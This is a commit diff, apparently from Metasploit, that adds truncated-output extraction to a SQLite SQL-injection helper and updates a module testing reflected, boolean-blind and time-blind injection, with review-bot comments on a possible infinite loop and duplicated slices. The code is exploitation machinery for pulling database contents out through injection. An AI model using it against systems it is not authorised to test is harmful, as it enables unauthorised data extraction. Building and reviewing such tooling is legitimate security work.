add truncated SQLi in SQLite, and update test module to add it as an option
This commit is contained in:
parent
8f9a849591
commit
4374edd37a
|
@ -9,7 +9,7 @@ module Msf::Exploit::SQLi::SQLitei
|
||||||
decode: proc { |data| Rex::Text.hex_to_raw(data) }
|
decode: proc { |data| Rex::Text.hex_to_raw(data) }
|
||||||
}
|
}
|
||||||
}.freeze
|
}.freeze
|
||||||
def initialize(opts, &query_proc)
|
def initialize(opts={}, &query_proc)
|
||||||
opts[:concat_separator] ||= ','
|
opts[:concat_separator] ||= ','
|
||||||
if opts[:encoder].is_a?(String) || opts[:encoder].is_a?(Symbol)
|
if opts[:encoder].is_a?(String) || opts[:encoder].is_a?(Symbol)
|
||||||
opts[:encoder] = opts[:encoder].downcase.intern
|
opts[:encoder] = opts[:encoder].downcase.intern
|
||||||
|
@ -81,6 +81,20 @@ module Msf::Exploit::SQLi::SQLitei
|
||||||
|
|
||||||
private
|
private
|
||||||
|
|
||||||
|
def truncated_query(query)
|
||||||
|
result = [ ]
|
||||||
|
offset = 1
|
||||||
|
loop do
|
||||||
|
slice = run_sql(query.sub(/\^OFFSET\^/, offset.to_s))
|
||||||
|
offset += @truncation_length # should be same as @truncation_length for most cases
|
||||||
|
result << slice
|
||||||
|
vprint_status "{SQLi} Truncated output: #{slice} of size #{slice.size}"
|
||||||
|
print_warning "The block returned a string larger than the truncation size : #{slice}" if slice.length > @truncation_length
|
||||||
|
break if slice.length < @truncation_length
|
||||||
|
end
|
||||||
|
result.join
|
||||||
|
end
|
||||||
|
|
||||||
def call_function(function)
|
def call_function(function)
|
||||||
function = @encoder[:encode].sub(/\^DATA\^/, function) if @encoder
|
function = @encoder[:encode].sub(/\^DATA\^/, function) if @encoder
|
||||||
output = nil
|
output = nil
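Review bot: `truncated_query` has no upper bound on the number of requests it issues: the `loop do` only exits when a slice comes back shorter than `@truncation_length`, so a target that keeps answering with a fixed-size body of at least that length (an error page, or a block that never applies the window) is polled indefinitely, one request per iteration. A second problem sits on the `print_warning` line: an oversized slice is still appended while `offset` only advances by `@truncation_length`, so whatever lies past the window is re-read at the next offset and duplicated in the join, unless the surplus is not result data at all, which the warning text suggests can happen. I would cap the round trips with a caller-overridable limit, warn when the cap is hit, and keep only the window of an oversized slice; `run_sql` and the initializer that sets `@truncation_length` are outside this hunk, so how a nil or zero length is handled is not visible here.
```ruby
# Bounded so a target that never returns a short slice cannot keep us polling forever.
def truncated_query(query, max_slices: 1024)
  result = []
  offset = 1
  max_slices.times do
    slice = run_sql(query.sub(/\^OFFSET\^/, offset.to_s))
    offset += @truncation_length
    # … unchanged: vprint_status of the slice …
    if slice.length > @truncation_length
      print_warning "The block returned a string larger than the truncation size : #{slice}"
      # anything past the window would be fetched again at the next offset; keep only the window
      slice = slice[0, @truncation_length]
    end
    result << slice
    return result.join if slice.length < @truncation_length
  end
  print_warning "Gave up after #{max_slices} truncated slices; the output may be incomplete"
  result.join
end
```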
|
||||||
|
|
|
@ -28,18 +28,19 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
[
|
[
|
||||||
Opt::RHOST('127.0.0.1'),
|
Opt::RHOST('127.0.0.1'),
|
||||||
OptString.new('TARGETURI', [true, 'The target URI', '/']),
|
OptString.new('TARGETURI', [true, 'The target URI', '/']),
|
||||||
OptInt.new('SQLI_TYPE', [true, '0)Regular. 1) BooleanBlind. 2)TimeBlind', 0]),
|
OptInt.new('SqliType', [true, '0)Regular. 1) BooleanBlind. 2)TimeBlind', 0]),
|
||||||
OptString.new('ENCODER', [false, 'an encoder to use (hex for example)', '']),
|
OptString.new('Encoder', [false, 'an encoder to use (hex for example)', '']),
|
||||||
OptBool.new('HEX_ENCODE_STRINGS', [false, 'replace strings in the query with hex numbers?', false]),
|
OptBool.new('HexEncodeStrings', [false, 'Replace strings in the query with hex numbers?', false]),
|
||||||
|
OptInt.new('TruncationLength', [true, 'Test SQLi with truncated output (0 or negative to disable)', 0])
|
||||||
]
|
]
|
||||||
)
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
def boolean_blind
|
def boolean_blind
|
||||||
encoder = datastore['ENCODER'].empty? ? nil : datastore['ENCODER'].intern
|
encoder = datastore['Encoder'].empty? ? nil : datastore['Encoder'].intern
|
||||||
sqli = SQLitei::BooleanBasedBlind.new({
|
sqli = SQLitei::BooleanBasedBlind.new({
|
||||||
encoder: encoder,
|
encoder: encoder,
|
||||||
hex_encode_strings: datastore['HEX_ENCODE_STRINGS']
|
hex_encode_strings: datastore['HexEncodeStrings']
|
||||||
}) do |payload|
|
}) do |payload|
|
||||||
res = send_request_cgi({
|
res = send_request_cgi({
|
||||||
'uri' => normalize_uri(target_uri.path, 'index.php'),
|
'uri' => normalize_uri(target_uri.path, 'index.php'),
|
||||||
|
@ -59,10 +60,12 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
end
|
end
|
||||||
|
|
||||||
def reflected
|
def reflected
|
||||||
encoder = datastore['ENCODER'].empty? ? nil : datastore['ENCODER'].intern
|
encoder = datastore['Encoder'].empty? ? nil : datastore['Encoder'].intern
|
||||||
|
truncation = datastore['TruncationLength'] <= 0 ? nil : datastore['TruncationLength']
|
||||||
sqli = SQLitei::Common.new({
|
sqli = SQLitei::Common.new({
|
||||||
encoder: encoder,
|
encoder: encoder,
|
||||||
hex_encode_strings: datastore['HEX_ENCODE_STRINGS']
|
hex_encode_strings: datastore['HexEncodeStrings'],
|
||||||
|
truncation_length: truncation
|
||||||
}) do |payload|
|
}) do |payload|
|
||||||
res = send_request_cgi({
|
res = send_request_cgi({
|
||||||
'uri' => normalize_uri(target_uri.path, 'index.php'),
|
'uri' => normalize_uri(target_uri.path, 'index.php'),
|
||||||
|
@ -78,7 +81,8 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
if !body
|
if !body
|
||||||
''
|
''
|
||||||
else
|
else
|
||||||
body.strip
|
body = body.strip
|
||||||
|
truncation ? body[0, truncation] : body
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
@ -90,10 +94,10 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
end
|
end
|
||||||
|
|
||||||
def time_blind
|
def time_blind
|
||||||
encoder = datastore['ENCODER'].empty? ? nil : datastore['ENCODER'].intern
|
encoder = datastore['Encoder'].empty? ? nil : datastore['Encoder'].intern
|
||||||
sqli = SQLitei::TimeBasedBlind.new({
|
sqli = SQLitei::TimeBasedBlind.new({
|
||||||
encoder: encoder,
|
encoder: encoder,
|
||||||
hex_encode_strings: datastore['HEX_ENCODE_STRINGS'],
|
hex_encode_strings: datastore['HexEncodeStrings'],
|
||||||
}) do |payload|
|
}) do |payload|
|
||||||
res = send_request_cgi({
|
res = send_request_cgi({
|
||||||
'uri' => normalize_uri(target_uri.path, 'index.php'),
|
'uri' => normalize_uri(target_uri.path, 'index.php'),
|
||||||
|
@ -139,7 +143,7 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
end
|
end
|
||||||
|
|
||||||
def run
|
def run
|
||||||
case datastore['SQLI_TYPE']
|
case datastore['SqliType']
|
||||||
when 0 then reflected
|
when 0 then reflected
|
||||||
when 1 then boolean_blind
|
when 1 then boolean_blind
|
||||||
when 2 then time_blind
|
when 2 then time_blind
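Review bot: The new `TruncationLength` option reads as if it applies to every `SqliType`, but in this section only `reflected` consults it (the `truncation = datastore['TruncationLength'] <= 0 ? nil : ...` line and the `body[0, truncation]` cut); the `boolean_blind` and `time_blind` hunks never read the key, so setting it with `SqliType` 1 or 2 silently does nothing, which may be intended since those variants return no output but is not stated anywhere. The option description should say so: `OptInt.new('TruncationLength', [true, 'Truncate the reflected output to this many characters to exercise truncated SQLi (0 or negative disables; only used when SqliType is 0)', 0])`. A comment above the `truncation =` line in `reflected`, such as `# Emulate a target that only echoes the first TruncationLength characters of the injected result`, would also tell a reader why the body is cut client-side after the `strip`. The `run` method's `case` continues past the end of the hunk.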
|
||||||
|
|